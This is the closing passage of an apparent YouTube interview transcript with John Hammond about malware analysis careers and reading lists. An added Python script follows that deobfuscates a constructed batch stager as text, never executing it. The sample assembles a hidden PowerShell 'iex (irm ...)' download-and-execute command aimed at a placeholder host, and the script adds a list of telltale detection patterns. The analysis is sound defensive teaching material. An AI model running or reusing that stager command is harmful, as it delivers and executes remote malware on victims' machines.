Yeah, yes, the best answer is yeah. I mean, I have normal working hours. We work as kind of a remote gig, which is lovely. Pre-pandemic, pre-world falling apart, it is always and will always be remote for kind of what I do. But when an ambulance goes by, we have to chase it, whether it's nine in the morning or nine at night. For Microsoft Exchange specifically, yeah, those were many late nights, burning the candle at both ends, maybe we're up to like three or four in the morning. But it's very cool to be with a team of other smart fellas and folks that want to get into the code like this. So that is certainly something that is still worthwhile and a lot of fun, if you're a nerd like me.

No, I mean, it's great. So do you have any books? I mean, you mentioned in another video, you said you wrote a book and that's how you got your first job. But are there any books that you would recommend, like a malware analysis book, or any, like, recommended books that someone can buy from Amazon or whatever to try and get into this?

Yeah, I don't know if I could give a one-size-fits-all answer, as usual.

Do you have like five books, or like a range of books?

Yeah, and again, it totally depends. If you want to get into, like, the low-level binary analysis, you can find an IDA Pro book from No Starch Press. There are a ton that come out from O'Reilly and Wiley, those are all great, and
sometimes it's even just getting used to the syntax and the language constructs. Kind of again, as I've showcased in batch and Python and many others we can get into, those are specific to how does this programming language work and what are they reading out of that. I have a ton of O'Reilly pocket references where I'll try and, you know, get used to the, hey, what can I do in this language? Other things that are more adversarial or offense oriented: there's a No Starch Press book I think called Offensive Go or Black Hat Go. Those are great for kind of getting used to, hey, what can you do in some language? It's very hard to reverse.

Yeah, I've got my sample in the back there, in my book. Yeah, John, so if you can send us a list of, like, books that you think are worth looking at, I mean, as long as it's not a thousand books, like your top 10 books or something like that, that would be great.

For sure.

John, as always, really want to thank you, man, appreciate it.

Thank you, this has been a blast. I hope there are some good gold nuggets out of there for some folks, and if you're interested again in all this, I'd be happy to chat about it more.

Oh definitely, definitely gonna twist your arm to come back a lot more. [Music]
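One way to pull the assembled payload out of a batch stager of the kind described in the conversation (a junk variable set to nothing, payload fragments parked in randomly named variables, a final line that stitches them back together through %...% and !...! expansion, then a hidden PowerShell window that fetches and evaluates more code). This is an added example and is not code from the video or from John Hammond; the sample script, its variable names and the example.invalid URL are all constructed for illustration, and the telltale list is a small illustrative set rather than a complete detection rule.

```python
"""Static deobfuscation of a batch stager that builds its payload from variables.

Added example; not the "spooky" file from the video. The sample below is
constructed to mimic the pattern described in the interview. Everything is
done as text substitution, nothing is executed.
"""
import re

# Constructed sample. Real samples usually park one character per variable;
# short chunks are used here only to keep the listing readable.
SAMPLE = r"""@echo off
cls
setlocal EnableDelayedExpansion
set "qX9zz="
set /a qR=%RANDOM% %% 7
set "Yx=pow"
set "Qd=er"
set "Lm=sh"
set "Jk=ell"
set "Wp= -w"
set "Rt= hid"
set "Gh=den"
set "Bv= -c"
set "Nz= iex"
set "Ct= (irm"
set "Hs= http"
set "Vf=s://"
set "Kq=exam"
set "Zw=ple."
set "Pn=inva"
set "Ob=lid/"
set "Uy=x.pn"
set "Ei=g)"
%Yx%%qX9zz%%Qd%!Lm!%qX9zz%%Jk%%Wp%%Rt%!Gh!%Bv%%qX9zz%%Nz%%Ct%%Hs%%Vf%%Kq%%Zw%%Pn%%Ob%%Uy%%Ei%
"""

# `set NAME=VALUE` or `set "NAME=VALUE"`; `set /a` and `set /p` deliberately do
# not match, so they stay visible in the output as ordinary statements.
SET_RE = re.compile(r'^\s*set\s+"?([^=/"\s][^="]*)=(.*?)"?\s*$', re.IGNORECASE)
# %NAME% (normal expansion) or !NAME! (delayed expansion)
VAR_RE = re.compile(r'%([^%\s]+)%|!([^!\s]+)!')


def parse_set_vars(script):
    """Collect every plain `set` assignment; names are case-insensitive in batch."""
    table = {}
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            table[m.group(1).strip().lower()] = m.group(2)
    return table


def expand(text, table, max_rounds=10):
    """Substitute %var%/!var! references until the text stops changing.

    Unknown names (e.g. %RANDOM%) are left untouched so nothing is guessed.
    """
    def sub(m):
        name = (m.group(1) or m.group(2)).lower()
        return table.get(name, m.group(0))
    for _ in range(max_rounds):
        new_text = VAR_RE.sub(sub, text)
        if new_text == text:
            break
        text = new_text
    return text


def deobfuscate(script):
    """Return the script with `set` lines removed and every reference expanded."""
    table = parse_set_vars(script)
    return [expand(line, table) for line in script.splitlines()
            if line.strip() and not SET_RE.match(line)]


# Telltale patterns from the discussion: a hidden PowerShell window, eval-style
# execution (Invoke-Expression / iex) and a fetch from a URL. Illustrative only.
TELLTALES = [
    ("powershell", re.compile(r"powershell", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hid", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("remote fetch", re.compile(r"\birm\b|invoke-restmethod|downloadstring|webclient", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]


def telltales(line):
    """Names of the telltale patterns that match a (deobfuscated) line."""
    return [name for name, rx in TELLTALES if rx.search(line)]


if __name__ == "__main__":
    for line in deobfuscate(SAMPLE):
        hits = telltales(line)
        print(line + ("   <-- " + ", ".join(hits) if hits else ""))
```

Running the script prints the stager with its `set` noise stripped and the stitched-together PowerShell line flagged by every telltale. Two caveats worth keeping in mind: the expansion is purely textual, so anything computed at runtime (the `set /a ... %RANDOM%` line here) is left as-is rather than guessed, and a sample that hides the `set` keyword itself, the TrickBot trick mentioned above, would slip past `SET_RE` and still needs a human in the loop.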
Info
Channel: David Bombal
Views: 84,394
Keywords: cyber security, john hammond, hacking, how to hack, capture the flag, hack the box, try hack me, cybersecurity, ethical hacking, cyber security career, malware, malware analysis, malware analysis tutorial for beginners, malware analysis tutorial, malware analysis tools, malware analysis lab, ethical hacking course, learn hacking, careers in cybersecurity, cyber security careers, cyber security engineer, cybersecurity jobs, cyber security jobs, cybersecurity careers
Id: sBuxwMAfGnI
Length: 55min 45sec (3345 seconds)
Published: Mon Aug 30 2021